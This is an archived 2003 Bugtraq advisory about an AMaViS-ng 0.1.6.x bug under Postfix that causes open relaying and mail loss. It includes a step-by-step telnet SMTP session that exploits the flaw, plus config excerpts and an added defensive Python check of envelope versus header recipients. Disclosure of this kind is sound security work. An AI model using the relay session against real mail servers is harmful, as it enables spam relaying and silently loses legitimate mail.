Bugtraq mailing list archives

AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss


From: Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1 () protected unixadm org>
Date: Mon, 7 Apr 2003 14:23:47 +0200

Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is 
not vulnerable), all email gets forwarded to the address specified by the 
"To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX () domainX tld
(250 ok)
rcpt to:userY () domain tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX () domainX tld
To: userZ () domainZ tld
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x 
installed must accept emails for userY () domain tld.

What it does:
userX () domainX tld is sending an email to userY () domain tld. The header of this 
email contains "To: userZ () domain tld". AMaViS-ng seems to parse the header 
and forwards the email to userZ () domain tld. userY () domain tld does not get 
this email.
As many postfix users trust their localhost (no restrictions for localhost), 
it is possible to relay an email or a spam mail this way.

configuration files (relevant parts):

# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter=filter:
filter unix - n n - - pipe
  flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf

# $amavis-ng/amavis.conf
[global]
mail-transfer-agent = Postfix

[Postfix]
postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,

Phil Cyc
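
The envelope/header mismatch described in this report, as an added example that is not part of the original post and is not AMaViS-ng code: it compares the recipients a header-parsing filter would derive with the envelope recipients, and builds a re-injection command from the envelope only. The function names and the sample addresses (written with "@" in place of the archive's obfuscation) are constructed for illustration.

```python
# Added illustration; not AMaViS-ng code. All function names are hypothetical.
from email import message_from_string
from email.utils import getaddresses

# Constructed sample mirroring the SMTP session in the post.
ENVELOPE_SENDER = "userX@domainX.tld"      # MAIL FROM
ENVELOPE_RCPTS = ["userY@domain.tld"]      # RCPT TO
RAW_MESSAGE = (
    "From: userX@domainX.tld\n"
    "To: userZ@domainZ.tld\n"
    "Subject: AMaViS-ng 0.1.6.x bug\n"
    "\n"
    "body\n"
)

def _norm(addr):
    """Lower-case the domain only; local parts may be case-sensitive."""
    local, _, domain = addr.rpartition("@")
    return f"{local}@{domain.lower()}"

def header_recipients(raw):
    """Recipients a filter would get by parsing To:/Cc: (the reported flaw)."""
    msg = message_from_string(raw)
    fields = msg.get_all("To", []) + msg.get_all("Cc", [])
    return [addr for _, addr in getaddresses(fields) if addr]

def recipient_drift(envelope_rcpts, delivered_rcpts):
    """Return (added, dropped) relative to the envelope.

    added   -> addresses the MTA never accepted via RCPT TO (relay risk)
    dropped -> accepted recipients that would not get the mail (mail loss)
    """
    env = {_norm(a) for a in envelope_rcpts}
    out = {_norm(a) for a in delivered_rcpts}
    return out - env, env - out

def reinject_argv(sender, envelope_rcpts, sendmail="/usr/sbin/sendmail"):
    """Build the re-injection command from the envelope only.

    Recipients are passed explicitly after "--"; sendmail's -t option
    (take recipients from the headers) is deliberately not used.
    """
    if not envelope_rcpts:
        raise ValueError("no envelope recipients; refusing to re-inject")
    return [sendmail, "-i", "-f", sender, "--", *envelope_rcpts]

if __name__ == "__main__":
    print(recipient_drift(ENVELOPE_RCPTS, header_recipients(RAW_MESSAGE)))
    print(reinject_argv(ENVELOPE_SENDER, ENVELOPE_RCPTS))
```

A filter regression test can assert that `recipient_drift` returns two empty sets for every message it re-injects.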

